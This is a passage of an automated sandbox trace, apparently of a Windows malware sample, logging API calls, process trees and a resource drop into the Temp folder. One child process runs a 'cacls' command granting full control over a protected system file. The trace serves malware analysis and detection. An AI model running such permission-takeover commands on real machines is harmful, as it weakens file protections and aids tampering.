!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17c0=äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0244.179] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x80) returned 0x579220 [0244.179] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0244.179] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0244.179] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x579220) returned 0x80 [0244.180] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0244.180] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0244.180] GetCurrentProcess () returned 0xffffffff [0244.180] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0244.180] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0244.180] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0244.180] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0244.180] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0244.180] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0244.180] LockResource (hResData=0x43c648) returned 0x43c648 [0244.180] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x5796f0 [0244.180] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0244.181] GetLastError () returned 0x20 [0244.181] GetLastError () returned 0x20 [0244.181] SetLastError (dwErrCode=0x20) [0244.181] GetLastError () returned 0x20 [0244.181] SetLastError (dwErrCode=0x20) [0244.181] GetLastError () returned 0x20 [0244.181] SetLastError (dwErrCode=0x20) [0244.181] GetLastError () returned 0x20 [0244.181] SetLastError (dwErrCode=0x20) [0244.181] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1000) returned 0x579710 [0244.181] GetLastError () returned 0x20 [0244.181] SetLastError (dwErrCode=0x20) [0244.181] GetLastError () returned 0x20 [0244.181] SetLastError (dwErrCode=0x20) [0244.181] GetLastError () returned 0x20 [0244.182] SetLastError (dwErrCode=0x20) [0244.182] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0244.183] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0244.185] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5787f0 | out: hHeap=0x560000) returned 1 [0244.185] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0244.185] ExitProcess (uExitCode=0x1) [0244.185] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x577098 | out: hHeap=0x560000) returned 1 Process: id = "270" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x1467d000" os_pid = "0x320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "260" os_parent_pid = "0x1c4" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 887 os_tid = 0xac4 Process: id = "271" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x1693d000" os_pid = "0xaf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "234" os_parent_pid = "0x7c4" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 888 os_tid = 0x74c [0245.255] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0245.255] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0245.255] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0245.256] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0245.256] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0245.256] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0245.256] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0245.256] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0245.257] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0245.257] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0245.257] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0245.257] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0245.257] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0245.257] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0245.258] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0245.259] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0245.260] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0245.261] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0245.261] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0245.261] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0245.261] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0245.261] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0245.261] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0245.261] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0245.262] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0245.263] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0245.264] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0245.265] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0245.265] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0245.266] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0245.267] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0245.267] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0245.267] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0245.267] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0245.267] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0245.267] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0245.267] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0245.267] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0245.267] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0245.267] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0245.268] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0245.268] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0245.268] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0245.268] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0245.268] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0245.269] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0245.269] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0245.269] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0245.269] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0245.269] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0245.269] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0245.269] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0245.269] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0245.269] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0245.271] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0245.271] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x47f75660, dwHighDateTime=0x1d68287)) [0245.271] GetCurrentThreadId () returned 0x74c [0245.271] GetCurrentProcessId () returned 0xaf0 [0245.271] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36560994487) returned 1 [0245.271] GetProcessHeap () returned 0x500000 [0245.271] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0245.271] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0245.272] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0245.273] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0245.273] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0245.273] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0245.273] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0245.273] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0245.273] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0245.274] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0245.274] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0245.274] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0245.274] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0245.274] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0245.274] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0245.275] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0245.275] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0245.275] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0245.275] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0245.275] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0245.275] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0245.276] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0245.276] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0245.276] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0245.276] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0245.276] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0245.277] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0245.278] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3bc) returned 0x517090 [0245.278] GetCurrentThreadId () returned 0x74c [0245.279] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18) returned 0x517458 [0245.279] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x800) returned 0x517478 [0245.279] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xc5155958, hStdError=0x0)) [0245.279] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0245.279] GetFileType (hFile=0x3) returned 0x2 [0245.280] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0245.280] GetFileType (hFile=0x7) returned 0x2 [0245.280] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0245.280] GetFileType (hFile=0xb) returned 0x2 [0245.281] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0245.281] GetEnvironmentStringsW () returned 0x517c80* [0245.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb7e) returned 0x518808 [0245.282] FreeEnvironmentStringsW (penv=0x517c80) returned 1 [0245.282] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x94) returned 0x517c80 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa0) returned 0x517d20 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3e) returned 0x514dc0 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x6c) returned 0x517dc8 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x6e) returned 0x517e40 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x78) returned 0x50f8f0 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x62) returned 0x517eb8 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x517f28 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x517f60 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x22) returned 0x517fb0 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x517fe0 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1a) returned 0x516a60 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4a) returned 0x518010 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x72) returned 0x50f970 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x518068 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x5180a0 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1c) returned 0x516a88 [0245.282] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xd2) returned 0x5180d8 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x7c) returned 0x5181b8 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x36) returned 0x518240 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3a) returned 0x514e08 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x90) returned 0x518280 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x518318 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x518348 [0245.283] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x36) returned 0x518380 [0245.283] RtlAllocateHeap 